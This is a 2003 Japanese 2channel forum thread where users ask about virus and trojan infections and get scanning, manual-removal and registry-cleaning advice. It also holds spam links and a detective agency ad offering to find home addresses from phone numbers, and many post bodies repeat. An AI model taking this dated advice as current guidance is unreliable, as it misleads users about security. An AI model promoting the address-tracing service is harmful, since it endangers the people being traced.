この操作をしたところ、PSEXEC.EXEはなかったのですが、PSEXESVC.EXEというものがみつかりました。
どう対処すればよいのでしょうか?お願いします。
>外部からの操作を可能にするための通信プログラムである "PSEXEC.EXE" を使用して、「TROJ_FLOOD.BI.DR」のコンポーネントである "STDE9.EXE" を作成して実行します。
>また、"PSEXEC.EXE"はプログラム自体の機能としては不正なものではありませんのでウイルス検出はありません。
タスクバーの何も無い部分でマウス右押し→タスクマネージャー→プロセスで確認して味噌。
この操作をしたところ、PSEXEC.EXEはなかったのですが、PSEXESVC.EXEというものがみつかりました。
どう対処すればよいのでしょうか?お願いします。
40 :名無しさん@お腹いっぱい。:03/02/22 13:47
>>39
もう1回ウイルスバスターで全てのドライブをスキャン。
もう1回ウイルスバスターで全てのドライブをスキャン。
41 :初心者:03/02/22 14:20
バスター検索では発見できなかったので、ノートンの方のオンラインスキャンを試してみました。
その結果、
C:\WINNT\Temp
C:\WINNT\Web
C:\WINNT\system32
のなかから
Backdoor.IRC.Zcrew
IRC.Trojan
Backdoor.Sdbot
の三種類に感染したファイルが全部で19個見つかりました。
ただし、メモリ上でウイルスは見つかりませんでした、とも表示されました。
バスター君では検出してくれないので対応しようがないのでしょうか?
一応トレンドマイクロのHPでウイルス名で検索して対応策をとってみます。
あぁ・・・19個もとは・・・鬱だ
その結果、
C:\WINNT\Temp
C:\WINNT\Web
C:\WINNT\system32
のなかから
Backdoor.IRC.Zcrew
IRC.Trojan
Backdoor.Sdbot
の三種類に感染したファイルが全部で19個見つかりました。
ただし、メモリ上でウイルスは見つかりませんでした、とも表示されました。
バスター君では検出してくれないので対応しようがないのでしょうか?
一応トレンドマイクロのHPでウイルス名で検索して対応策をとってみます。
あぁ・・・19個もとは・・・鬱だ
42 :初心者:03/02/22 15:03
度々すみません。今さっき、下記のウイルスが検出されました・・・
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_GLITCH.DRP
削除手順の1)2)はレジストリが存在しなかったため、作業を飛ばして
3)をやっているのですが、
explorer.exeはウインドウズが使用中と表示されて削除することが出来ません。
どうすればよいでしょうか?
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_GLITCH.DRP
削除手順の1)2)はレジストリが存在しなかったため、作業を飛ばして
3)をやっているのですが、
explorer.exeはウインドウズが使用中と表示されて削除することが出来ません。
どうすればよいでしょうか?
43 :c:03/02/22 15:15
↓↓↓↓↓★ココだ★↓↓↓↓↓
http://jsweb.muvc.net/index.html
http://jsweb.muvc.net/index.html
44 :名無しさん@お腹いっぱい。:03/02/22 15:27
45 :初心者:03/02/22 15:38
でも一分間に10回もトロイアタックがあってパソコンがカタカタとうるさいのです。
それ以外の被害は格別ないといえばないのですが。
それ以外の被害は格別ないといえばないのですが。
★あなたのお悩み解決致します!!
●浮気素行調査
彼氏、彼女、妻、夫の浮気を調査致します!!
●盗聴器盗撮機発見
あなたの部屋に誰かが仕掛けているかも!!
●行方調査
行方不明になっている家族の消息を調査致します!!
●電話番号から住所割り出し
一般電話、携帯から住所を割り出し致します!!
●ストーカー対策
社会問題ともなっているストーカーを撃退致します!!
その他人生相談からどんなお悩みでも解決いたします!!
直通 090−8505−3086
URL http://www.h5.dion.ne.jp/~grobal/
メール [email protected]
グローバル探偵事務局
●浮気素行調査
彼氏、彼女、妻、夫の浮気を調査致します!!
●盗聴器盗撮機発見
あなたの部屋に誰かが仕掛けているかも!!
●行方調査
行方不明になっている家族の消息を調査致します!!
●電話番号から住所割り出し
一般電話、携帯から住所を割り出し致します!!
●ストーカー対策
社会問題ともなっているストーカーを撃退致します!!
その他人生相談からどんなお悩みでも解決いたします!!
直通 090−8505−3086
URL http://www.h5.dion.ne.jp/~grobal/
メール [email protected]
グローバル探偵事務局
47 :19:03/02/22 19:04
48 :名無しさん@お腹いっぱい。:03/02/22 19:12
>>47
ノートンが復元できなくて、それを使いたいなら手動で復元しなきゃいけないわけだが、
>>47はできないんだろう。それなら削除してしまえ。
本当に必要なプログラムは正規ユーザならバックアップ媒体から復元できるから問題ない。
ノートンが復元できなくて、それを使いたいなら手動で復元しなきゃいけないわけだが、
>>47はできないんだろう。それなら削除してしまえ。
本当に必要なプログラムは正規ユーザならバックアップ媒体から復元できるから問題ない。
49 :cheshire-cat ◆PhCATJR.v6 :03/02/22 19:51
>ひろちゃんたん
>NTに入れるとデータ転送速度の低下が考えられたので導入はしていなかったです
ノートンって、ネットワーク経由でスキャンできなかったっけ?
以前やった記憶が。
もちろん、捨てルーター経由で2台だけ接続してやりますたが。
んでも漏れは多少手間かかっても、HDぶっこ抜いてやってまする(お奨めしませぬが)。
で、レジストリは手動で修復みたいな。
>NTを止めてxpとMeでは問題なしということであれば
NTってServerでしょか、それともWorkstation。漏れはWorkstationだと判断してレスしたんすけど。
ブラウジング関連としては。
http://www.samba.gr.jp/doc/browsing/browsing01.html
http://www.zdnet.co.jp/help/howto/win/win2000/0007special/dns/chap1/11.html
http://homepage2.nifty.com/winfaq/c/network.html#986
http://support.microsoft.com/default.aspx?scid=kb;ja;JP136712
http://www.ms-atelier.com/mobile/thinkpad/2000.html
>NTに入れるとデータ転送速度の低下が考えられたので導入はしていなかったです
ノートンって、ネットワーク経由でスキャンできなかったっけ?
以前やった記憶が。
もちろん、捨てルーター経由で2台だけ接続してやりますたが。
んでも漏れは多少手間かかっても、HDぶっこ抜いてやってまする(お奨めしませぬが)。
で、レジストリは手動で修復みたいな。
>NTを止めてxpとMeでは問題なしということであれば
NTってServerでしょか、それともWorkstation。漏れはWorkstationだと判断してレスしたんすけど。
ブラウジング関連としては。
http://www.samba.gr.jp/doc/browsing/browsing01.html
http://www.zdnet.co.jp/help/howto/win/win2000/0007special/dns/chap1/11.html
http://homepage2.nifty.com/winfaq/c/network.html#986
http://support.microsoft.com/default.aspx?scid=kb;ja;JP136712
http://www.ms-atelier.com/mobile/thinkpad/2000.html
50 :19:03/02/22 20:01
>>48
レスどうもです!
もちろん正規ユーザです。
ノートンが検疫で見つけた感染ファイルは自動でバックアップが取ってあるということなのでしょうか?
ここだとスレ違いかもしれませんがOpenJaneを使ってまして、そのdatファイルが感染しているようなのです。
他にもJane以外での感染もあるのですが、Janeのdatファイルについているウィルスというのは
本当にウィルスなのでしょうか?勝手な想像なのですが、Janeの中のスクリプトなどを勘違いしているとも思いました。
結局、ノートンがウィルスを発見した段階で元ファイルを隔離してくれているとしたら
何も考えずに感染ファイルは削除してもよいということで合ってますか?
レスどうもです!
もちろん正規ユーザです。
ノートンが検疫で見つけた感染ファイルは自動でバックアップが取ってあるということなのでしょうか?
ここだとスレ違いかもしれませんがOpenJaneを使ってまして、そのdatファイルが感染しているようなのです。
他にもJane以外での感染もあるのですが、Janeのdatファイルについているウィルスというのは
本当にウィルスなのでしょうか?勝手な想像なのですが、Janeの中のスクリプトなどを勘違いしているとも思いました。
結局、ノートンがウィルスを発見した段階で元ファイルを隔離してくれているとしたら
何も考えずに感染ファイルは削除してもよいということで合ってますか?
51 :名無しさん@お腹いっぱい。:03/02/22 20:03
>>50
ウィルスじゃないな・・・
もちろん>>2に書かれていた
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50
↑は見たよな、見てから聞いてるんだよな、
当然考えられる検索はやったもんな
ウィルスじゃないな・・・
もちろん>>2に書かれていた
ノートンがvbsウィルスのソースに誤反応2
http://pc2.2ch.net/test/read.cgi/pcqa/1033948204/l50
↑は見たよな、見てから聞いてるんだよな、
当然考えられる検索はやったもんな
52 :ひろちゃん:03/02/22 20:43
>ノートンって、ネットワーク経由でスキャンできなかったっけ?
>以前やった記憶が。
>もちろん、捨てルーター経由で2台だけ接続してやりますたが。
できますです、やってみます
もう頭から手動でやらないとだめと思っていたものですから、
ありがとうございます
>以前やった記憶が。
>もちろん、捨てルーター経由で2台だけ接続してやりますたが。
できますです、やってみます
もう頭から手動でやらないとだめと思っていたものですから、
ありがとうございます
53 :名無しさん@お腹いっぱい。:03/02/22 20:58
ttp://www.asahi-net.or.jp/~bj9k-tn/image/gate2.png
ニムダってMAILER-DAEMONや postmasterからメールを送信することってあるの??
単純に考えれば私が無差別にアドレスを生成してメールを送信すればこのようなことになってもおかしくはないと思うけど
ニムダってMAILER-DAEMONや postmasterからメールを送信することってあるの??
単純に考えれば私が無差別にアドレスを生成してメールを送信すればこのようなことになってもおかしくはないと思うけど
54 :19:03/02/22 21:21
55 :名無しさん@お腹いっぱい。:03/02/22 22:37
ウイルスなのかどうか困ってます
ノートンINS2003無反応。 バスターオンラインスキャンも検出ナシ
HPの更新かけようとファイルをアップロードするとJavaが勝手に挿入されます。
・・・該当するようなウイルスがあるならウイルス名教えてください (´Д`;)
ノートンINS2003無反応。 バスターオンラインスキャンも検出ナシ
HPの更新かけようとファイルをアップロードするとJavaが勝手に挿入されます。
・・・該当するようなウイルスがあるならウイルス名教えてください (´Д`;)
56 :cheshire-cat ◆PhCATJR.v6 :03/02/22 23:18
57 :55:03/02/22 23:51
>>56
スクリプト自体はブラウザを判定するものらしいです。
(イロイロ検索して同じ記述のをJAVAサイトでみかけました)
ファイルをUPしてる鯖はレンタル(有料)のところなので勝手に
スクリプトを挿入される事はないです。
特に害がないようなら気にするな、ですませてしまっても
いいものでしょうか?
スクリプト自体はブラウザを判定するものらしいです。
(イロイロ検索して同じ記述のをJAVAサイトでみかけました)
ファイルをUPしてる鯖はレンタル(有料)のところなので勝手に
スクリプトを挿入される事はないです。
特に害がないようなら気にするな、ですませてしまっても
いいものでしょうか?
58 :名無しさん@お腹いっぱい。:03/02/23 02:32
OSは2K。使用メーラーはBecky! Ver.2です。
ノートンアンチウイルス2003を導入したら
YAHOO!アカウントのメールが送受信できなくなりました。
ISPのメールは送受信できるようになったんだけど。
POP3は ***.*.*.* (*は数字)
SMTPは smtp.mail.yahoo.co.jp
ユーザーIDは ****/pop.mail.yahoo.co.jp(*はアカウント名)なんですけど。
YAHOOメールを使っている方、設定はどうしていますか?
ノートンアンチウイルス2003を導入したら
YAHOO!アカウントのメールが送受信できなくなりました。
ISPのメールは送受信できるようになったんだけど。
POP3は ***.*.*.* (*は数字)
SMTPは smtp.mail.yahoo.co.jp
ユーザーIDは ****/pop.mail.yahoo.co.jp(*はアカウント名)なんですけど。
YAHOOメールを使っている方、設定はどうしていますか?
59 :名無しさん@お腹いっぱい。:03/02/23 04:43
レッドロフの症状でデスクトップの壁紙が表示されなくなるってのが
ありますがウイルスを駆除してもそれが直らないのは普通ですか?
ありますがウイルスを駆除してもそれが直らないのは普通ですか?
60 :cheshire-cat ◆PhCATJR.v6 :03/02/23 07:33
>>59
デスクトップのdesktop.iniとfolder.httを削除するとか。
デスクトップのdesktop.iniとfolder.httを削除するとか。
61 :cheshire-cat ◆PhCATJR.v6 :03/02/23 07:36
62 :19:03/02/23 14:56
どなたか>>54の後半部分を答えていただけると助かります。
63 :名無しさん@お腹いっぱい。:03/02/23 18:10
64 :19:03/02/23 20:26
>>63
レスありがとうございます。
ということは、再インストールした方がよいということですね?
ノートン導入していて定義も常に気を配っていたにもかかわらず
なぜ、感染してしまったのでしょうか?
添付ファイルは当然のこと、怪しい物には一切手をつけていなんです。
そういう場合でも感染してしまうことってあるのでしょうか?
レスありがとうございます。
ということは、再インストールした方がよいということですね?
ノートン導入していて定義も常に気を配っていたにもかかわらず
なぜ、感染してしまったのでしょうか?
添付ファイルは当然のこと、怪しい物には一切手をつけていなんです。
そういう場合でも感染してしまうことってあるのでしょうか?
65 :名無しさん@お腹いっぱい。:03/02/23 21:08
当方win2000使用。ウイルスバスターはいっているのですが、
先日TROJ_GLITCH.DRPが発見されました。(ファイル名はSTDE9.exe)
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_GLITCH.DRP
以降、ウイルスバスターのファイアーウォールログに5秒に一回くらい
トロイの木馬ブロックが表示されるようになりました。
しかし、全ドライブ検索してもウイルスは見つかりません。
このような場合どう対処すればよいのでしょうか?
先日TROJ_GLITCH.DRPが発見されました。(ファイル名はSTDE9.exe)
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_GLITCH.DRP
以降、ウイルスバスターのファイアーウォールログに5秒に一回くらい
トロイの木馬ブロックが表示されるようになりました。
しかし、全ドライブ検索してもウイルスは見つかりません。
このような場合どう対処すればよいのでしょうか?
66 :名無しさん@お腹いっぱい。:03/02/23 22:56
質問です。
win2000で、何か(忘れた)のウイルスに感染、手動で除去しました
レジストリーも修正しなければならなかったが、やりかたわからず放置
しばらくしたら、ハードディスクがハード的に故障しました。(メーカーいわく)
ウイルスで、ハード故障なんてあるのですか
win2000で、何か(忘れた)のウイルスに感染、手動で除去しました
レジストリーも修正しなければならなかったが、やりかたわからず放置
しばらくしたら、ハードディスクがハード的に故障しました。(メーカーいわく)
ウイルスで、ハード故障なんてあるのですか
67 :名無しさん@お腹いっぱい。:03/02/23 23:05
68 :66です:03/02/23 23:14
69 :名無しさん@お腹いっぱい。:03/02/23 23:29
>あるよ
( ´_ゝ`)プ
( ´_ゝ`)プ
70 :名無しさん@お腹いっぱい。:03/02/23 23:46
>>69
(・∀・)ニヤニヤ
(・∀・)ニヤニヤ
71 :名無しさん@お腹いっぱい。:03/02/23 23:53
>>69
( ´д)ヒソ(´д`)ヒソ(д` )
( ´д)ヒソ(´д`)ヒソ(д` )
72 :名無しさん@お腹いっぱい。:03/02/23 23:56
>>69
( ゚д゚)ポカーン
( ゚д゚)ポカーン
73 :名無しさん@お腹いっぱい。:03/02/24 08:32
age
74 :名無しさん@お腹いっぱい。:03/02/24 10:50
今日、立ち上げたらRっていう文字のついたやつがタスクトレイに!
タスクマネージャーからr_sever.exeってかいたやつが怪しそうだったので
削除しようとするが、送り先が使用中といわれ削除できない!
ウィルススキャンでは、W32.Klez.H@mmトロイに感染したファイルは削除しましたが
Backdoor.Sdbotに感染していると言われたものは削除しようとしましたがそこには
なにもなく?そのままです。どなたか、上記のやつを退治する方法知りませんでしょうか?
ちなみに、シマンテックの推奨する手動駆除方法では、レジストリの変更のところで
この値を探せといっているものが私のパソには見当たらず、はて?と言った感じで
そこで行き詰まっています。よろしくお願いします。
ちなみに、OSはW2Kです。
タスクマネージャーからr_sever.exeってかいたやつが怪しそうだったので
削除しようとするが、送り先が使用中といわれ削除できない!
ウィルススキャンでは、W32.Klez.H@mmトロイに感染したファイルは削除しましたが
Backdoor.Sdbotに感染していると言われたものは削除しようとしましたがそこには
なにもなく?そのままです。どなたか、上記のやつを退治する方法知りませんでしょうか?
ちなみに、シマンテックの推奨する手動駆除方法では、レジストリの変更のところで
この値を探せといっているものが私のパソには見当たらず、はて?と言った感じで
そこで行き詰まっています。よろしくお願いします。
ちなみに、OSはW2Kです。
75 :名無しさん@お腹いっぱい。:03/02/24 10:56
>>74
これだよね。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.sdbot.html
Backdoor.Sdbotの発見場所とどのレジストリが見当たらなかったか明確に。
これだよね。
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.sdbot.html
Backdoor.Sdbotの発見場所とどのレジストリが見当たらなかったか明確に。
76 :名無しさん@お腹いっぱい。:03/02/24 11:02
77 :名無しさん@お腹いっぱい。:03/02/24 12:02
質問でつ。よろしくおねがいしまつ。
HPを運営しているんですが、
見た人から「ウィルスに感染してるよ」と報告がありました。
自分ではよくわかんないのですが、ウィルス感染はどこでしらべられますか?
あと対策法をおおしえください。
HPを運営しているんですが、
見た人から「ウィルスに感染してるよ」と報告がありました。
自分ではよくわかんないのですが、ウィルス感染はどこでしらべられますか?
あと対策法をおおしえください。
78 :名無しさん@お腹いっぱい。:03/02/24 12:22
79 :名無しさん@お腹いっぱい。:03/02/24 12:23
>>77
アンチウィルス(ウィルス対策製品)ぐらい買って常駐させとけよ。
アンチウィルス(ウィルス対策製品)ぐらい買って常駐させとけよ。
80 :77:03/02/24 13:51
ご相談するまでもなく解決しますた。
失礼しました〜♪
失礼しました〜♪
81 :名無しさん@お腹いっぱい。:03/02/24 15:00
82 :名無しさん@お腹いっぱい。:03/02/24 15:29
83 :名無しさん@お腹いっぱい。:03/02/24 15:32
>>82
ヽ(`Д´)ノ ウワァァァァーーーーーーン!!! 夢に出そうだ(w
ヽ(`Д´)ノ ウワァァァァーーーーーーン!!! 夢に出そうだ(w
84 :名無しさん@お腹いっぱい。:03/02/24 16:54
≫75
こんなんでした。
次のレジストリキーを1つずつ選択します。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RunServices
上記のキーごとに、画面右側で次の値を探し、発見した値を削除します。
Configuration Manager Cnfgldr.exe
System Monitor Sysmon16.exe
(またはトロイの木馬として検出されたファイルを参照している値)
ここでRunはありましたがその中に上記値はありませんでした。
またRunServicesはそのものがありませんでした。
とこんな感じです。
こんなんでした。
次のレジストリキーを1つずつ選択します。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\
Windows\CurrentVersion\RunServices
上記のキーごとに、画面右側で次の値を探し、発見した値を削除します。
Configuration Manager Cnfgldr.exe
System Monitor Sysmon16.exe
(またはトロイの木馬として検出されたファイルを参照している値)
ここでRunはありましたがその中に上記値はありませんでした。
またRunServicesはそのものがありませんでした。
とこんな感じです。
85 :名無しさん@お腹いっぱい。:03/02/24 19:08
お邪魔します。
本日OnMouseOutという件名の添付ファイルつきメールが届きました。
これは開いたらヤバイですか?
本日OnMouseOutという件名の添付ファイルつきメールが届きました。
これは開いたらヤバイですか?
86 :名無しさん@お腹いっぱい。:03/02/24 19:29
>>85
>1を読み直す。件名・ファイル名では判断できない。
>1を読み直す。件名・ファイル名では判断できない。
55です。 あれからイロイロと調べていじってみた結果
自PCでJAVAが含まれているWEBページのソースを見ると
ヘンなスクリプトが追加されてしまうことがわかりました。
(自分のサイト以外のトコのでも)
原因はわかりませんが、ウイルスではないようなので(ジョーク系のようです、多分)
他スレに逝ってみます。
cheshire-cat ◆PhCATJR.v6 さん、ありがとうございました
自PCでJAVAが含まれているWEBページのソースを見ると
ヘンなスクリプトが追加されてしまうことがわかりました。
(自分のサイト以外のトコのでも)
原因はわかりませんが、ウイルスではないようなので(ジョーク系のようです、多分)
他スレに逝ってみます。
cheshire-cat ◆PhCATJR.v6 さん、ありがとうございました
88 :名無しさん@お腹いっぱい。:03/02/25 12:13
age
89 :名無しさん@お腹いっぱい。:03/02/25 12:17
jdbgmgr.exe
ってウイルスなのですか?
灰色のテディベアのアイコンが表示されています。
ってウイルスなのですか?
灰色のテディベアのアイコンが表示されています。
90 :名無しさん@お腹いっぱい。:03/02/25 12:32
91 :名無しさん@お腹いっぱい。:03/02/25 12:33
>>89
何度も何度も既出。検索するなり過去ログ読んでから書き込んで欲しい。
「jdbgmgr.exe」に関するデマメール情報
http://www.ipa.go.jp/security/topics/alert140515.html
何度も何度も既出。検索するなり過去ログ読んでから書き込んで欲しい。
「jdbgmgr.exe」に関するデマメール情報
http://www.ipa.go.jp/security/topics/alert140515.html
92 :名無しさん@お腹いっぱい。:03/02/25 13:02
今日、ノートンがMacro.srcなるウィルスを感知したのですが、これについて
情報を調べてみてもどこにものってないんです。
これはいったいなんなんですか??
情報を調べてみてもどこにものってないんです。
これはいったいなんなんですか??
93 :名無しさん@お腹いっぱい。:03/02/25 13:05
>情報を調べてみてもどこにものってないんです。
大嘘つきめ
http://www.google.com/search?q=%22Macro.src%22&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2
大嘘つきめ
http://www.google.com/search?q=%22Macro.src%22&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2
94 :名無しさん@お腹いっぱい。:03/02/25 13:16
(´-`).。oO(http://pc2.2ch.net/pcqa/で訊くべき質問多すぎ…)
95 :名無しさん@お腹いっぱい。:03/02/25 15:20
時間を置いてCDドライブのアクセスランプが
勝手に点灯したりするんですが
ウイルスにやられちまってるんでしょうか?
ウイルスバスターオンラインで一応調べてみたんすが、
何も検出はされなかったんです。
勝手に点灯したりするんですが
ウイルスにやられちまってるんでしょうか?
ウイルスバスターオンラインで一応調べてみたんすが、
何も検出はされなかったんです。
96 :名無しさん@お腹いっぱい。:03/02/25 15:49
97 :名無しさん@お腹いっぱい。:03/02/25 22:28
age
98 :名無しさん@お腹いっぱい。:03/02/26 09:14
あげ
99 :名無しさん@お腹いっぱい。:03/02/26 12:07
W32.HLLW.Lovgate.C@mm
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
WORM_LOVGATE.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_LOVGATE.C
W32/Lovgate@M
http://www.nai.com/japan/virusinfo/virL.asp?v=W32/Lovgate@M
http://www.symantec.com/region/jp/sarcj/data/w/[email protected]
WORM_LOVGATE.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_LOVGATE.C
W32/Lovgate@M
http://www.nai.com/japan/virusinfo/virL.asp?v=W32/Lovgate@M
あぼーん
101 :名無しさん@お腹いっぱい。:03/02/26 15:20
>100
板違い。帰れ。
板違い。帰れ。
102 :名無しさん@お腹いっぱい。:03/02/26 17:41
WINMEでノートンアンチウィルス使用なのですが
画面にIEの背景緑の窓が開き、顔文字らしきものが書いてあります。
その窓がデスクトップ上を勝手に動き回りWINも強制終了出来ません。
多分hotmailからの感染だと思うのですがやっぱウィルスですか?汗
ノートンさんには引っかからなかったんだけど...。
画面にIEの背景緑の窓が開き、顔文字らしきものが書いてあります。
その窓がデスクトップ上を勝手に動き回りWINも強制終了出来ません。
多分hotmailからの感染だと思うのですがやっぱウィルスですか?汗
ノートンさんには引っかからなかったんだけど...。
103 :名無しさん@お腹いっぱい。:03/02/26 17:55
104 :100はナニ?????:03/02/26 22:52
105 :名無しさん@お腹いっぱい。:03/02/26 22:59
>>104
氏ね、無断コピぺ厨房
氏ね、無断コピぺ厨房
106 :名無しさん@お腹いっぱい。:03/02/26 23:01
107 :名無しさん@お腹いっぱい。:03/02/27 08:27
age
108 :名無しさん@お腹いっぱい。:03/02/27 10:36
先日、メールに乗ってやってきたW32.Klez.H@mmとW32.ElKernにPCが感染しました。
即駆除し、トレンドマイクロとシマンテックのオンラインスキャン
及びノートンでもウィルススキャンして、感染ファイル0を確認した上で
PCをリカバリーし、再度ウィルススキャンをかけて感染ファイルがない事を確認しました。
しかしながらPCがちょっと不審な動きをしたように感じただけで、
ウィルスがまだPCに潜在しているのではと気になってしかたがありません。
ここまでやって感染が確認されなければ、ウィルスは消滅したと考えてもよろしいのでしょうか?
googleで検索した対処法では、ウィルス感染PCを駆除しないままリカバリーしても
ウィルスは駆除出来ると書いてあったのですが、駆除した上でのリカバリーなら
なお安心してもよろしいのでしょうか?
どうかご教授お願いいたします。
長文で失礼いたしました。
即駆除し、トレンドマイクロとシマンテックのオンラインスキャン
及びノートンでもウィルススキャンして、感染ファイル0を確認した上で
PCをリカバリーし、再度ウィルススキャンをかけて感染ファイルがない事を確認しました。
しかしながらPCがちょっと不審な動きをしたように感じただけで、
ウィルスがまだPCに潜在しているのではと気になってしかたがありません。
ここまでやって感染が確認されなければ、ウィルスは消滅したと考えてもよろしいのでしょうか?
googleで検索した対処法では、ウィルス感染PCを駆除しないままリカバリーしても
ウィルスは駆除出来ると書いてあったのですが、駆除した上でのリカバリーなら
なお安心してもよろしいのでしょうか?
どうかご教授お願いいたします。
長文で失礼いたしました。
109 :名無しさん@お腹いっぱい。:03/02/27 10:41
110 :名無しさん@お腹いっぱい。:03/02/27 10:41
>>108
W32.Klez駆除ツール使ってみた?
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html
きちんと駆除して、アンチウィルスソフトを最新定義で常駐させてれば気にすることはないはず。
WindowsUpdateもやっておくこと。
W32.Klez駆除ツール使ってみた?
http://www.symantec.com/region/jp/sarcj/data/w/w32.klez.removal.tool.html
きちんと駆除して、アンチウィルスソフトを最新定義で常駐させてれば気にすることはないはず。
WindowsUpdateもやっておくこと。
111 :名無しさん@お腹いっぱい。:03/02/27 11:11
>>109さん
すみません、ど初心者なのでこれがOSの再インストールにあたるかはわからないのですが
リカバリーディスクによる、出荷時点への初期化をいたしました。
それがOS再インストール&HDの初期化と考えてもよろしいのでしょうか?
>>110さん
はい。ウィルス駆除には、Klezスレッドを辿り、そのツールを頼る事で駆除がかないました。
お二方のアドバイスにありますように、今後は定義最新のソフトの常駐を万全とし
WindowsUpdateを怠らないよう肝に銘じておきます。
お二方のご教授とアドバイスに感謝します。ありがとうございましたm(_)m
すみません、ど初心者なのでこれがOSの再インストールにあたるかはわからないのですが
リカバリーディスクによる、出荷時点への初期化をいたしました。
それがOS再インストール&HDの初期化と考えてもよろしいのでしょうか?
>>110さん
はい。ウィルス駆除には、Klezスレッドを辿り、そのツールを頼る事で駆除がかないました。
お二方のアドバイスにありますように、今後は定義最新のソフトの常駐を万全とし
WindowsUpdateを怠らないよう肝に銘じておきます。
お二方のご教授とアドバイスに感謝します。ありがとうございましたm(_)m
112 :名無しさん@お腹いっぱい。:03/02/27 17:15
age
113 :名無しさん@お腹いっぱい。:03/02/27 17:42
114 :名無しさん@お腹いっぱい。:03/02/27 17:50
115 :名無しさん@お腹いっぱい。:03/02/27 18:32
116 :名無しさん@お腹いっぱい。:03/02/27 18:38
確かに似たような感じですね。
毎日出るわけではないので...MERASH.Aも何かのタイミングで
行動を起こすのでしょうか...。
今度現象が出たらタスクマネージャーで見てみます。
でも前回タスクマネージャーが動かなかったんだよなぁ...。
>>113 ありがとうございました。
毎日出るわけではないので...MERASH.Aも何かのタイミングで
行動を起こすのでしょうか...。
今度現象が出たらタスクマネージャーで見てみます。
でも前回タスクマネージャーが動かなかったんだよなぁ...。
>>113 ありがとうございました。
117 :名無しさん@お腹いっぱい。:03/02/27 18:41
>>115
この板では鑑定はやらない。
ラウンジ 勇気がなくて見られない画像解説スレ part301
http://ex.2ch.net/test/read.cgi/entrance/1046318666/l50へ
この板では鑑定はやらない。
ラウンジ 勇気がなくて見られない画像解説スレ part301
http://ex.2ch.net/test/read.cgi/entrance/1046318666/l50へ
118 :bloom:03/02/27 18:46
119 :名無しさん@お腹いっぱい。:03/02/27 20:20
120 :名無しさん@お腹いっぱい。:03/02/28 08:17
age
121 :名無しさん@お腹いっぱい。:03/02/28 14:54
すみません。ウイルスバスター2003の検索でウイルスが確認されないにもかかわらず、
ファイアーウォールログに十数回/minものトロイの木馬ブロックがあるのはおかしいでしょうか?
ウイルスチェックに引っかからないため、どのように対応してよいのかわかりません。
よろしくおねがいしますm(_ _)m
ファイアーウォールログに十数回/minものトロイの木馬ブロックがあるのはおかしいでしょうか?
ウイルスチェックに引っかからないため、どのように対応してよいのかわかりません。
よろしくおねがいしますm(_ _)m
122 :名無しさん@お腹いっぱい。:03/02/28 15:34
>>121
トロイの木馬ブロックはインバウンド(外から内)をブロック。
ウィルスチェックはPC内部にトロイ等がいるかをスキャン。
"トロイの木馬ブロック"の意味がわかってないんでしょ。
まずは、トロイの木馬ブロックの意味をトレンドマイクロのサイトで検索汁。
トロイの木馬ブロックはインバウンド(外から内)をブロック。
ウィルスチェックはPC内部にトロイ等がいるかをスキャン。
"トロイの木馬ブロック"の意味がわかってないんでしょ。
まずは、トロイの木馬ブロックの意味をトレンドマイクロのサイトで検索汁。
123 :名無しさん@お腹いっぱい。:03/02/28 16:19
昨日ホームページを見ていたら、突然すごい量のデータが送られてきてPCが不安定になりました。
その後インターネットの接続ができなくなったので、接続を見てみると、ユーザー名とパスワードが消去されていました。
おかししと思ってアンチウイルスをダウンロードしてチェックしたところ、HTML.Rodlof.Aに感染しているとのことで、感染しているものを2個削除しました。
でも、このウィルスについて調べたところ、症状が全く違っているので、本当にこのウィルスなのかどうか不安です。
昨日更新されたファイルを検索してみたところ、ちょうどPCがおかしくなった時間に大きなファイルが更新されています。
ウィルスチェックで問題部分を削除してあるのに、こういった変なファイルが残っているのでとても不安なのです。
単にウィルスチェックをし、ひっかかったファイルを削除するだけで問題は解決されるものなのでしょうか。
教えてください。よろしくお願いします。
その後インターネットの接続ができなくなったので、接続を見てみると、ユーザー名とパスワードが消去されていました。
おかししと思ってアンチウイルスをダウンロードしてチェックしたところ、HTML.Rodlof.Aに感染しているとのことで、感染しているものを2個削除しました。
でも、このウィルスについて調べたところ、症状が全く違っているので、本当にこのウィルスなのかどうか不安です。
昨日更新されたファイルを検索してみたところ、ちょうどPCがおかしくなった時間に大きなファイルが更新されています。
ウィルスチェックで問題部分を削除してあるのに、こういった変なファイルが残っているのでとても不安なのです。
単にウィルスチェックをし、ひっかかったファイルを削除するだけで問題は解決されるものなのでしょうか。
教えてください。よろしくお願いします。
124 :名無しさん@お腹いっぱい。:03/02/28 16:23
>>123
ウィルスによる。
Redlofであることが確実なら、
http://www.ipa.go.jp/security/topics/newvirus/redlof.html参照。
アンチウィルスソフトは常駐させとけ。
ウィルスによる。
Redlofであることが確実なら、
http://www.ipa.go.jp/security/topics/newvirus/redlof.html参照。
アンチウィルスソフトは常駐させとけ。
125 :x:03/02/28 16:37
↓↓↓↓↓★ココだ★↓↓↓↓↓
http://www.pink-angel.jp/betu/linkvp/linkvp.html
http://www.pink-angel.jp/betu/linkvp/linkvp.html
126 :名無しさん@お腹いっぱい。:03/02/28 17:57
127 :名無しさん@お腹いっぱい。:03/02/28 18:14
(゚Д゚)ゴルァ!!
128 :名無しさん@お腹いっぱい。:03/02/28 20:23
最近、ポート520に大量にパケットが送られてきますが
ウイルスでしょうか?
ウイルスでしょうか?
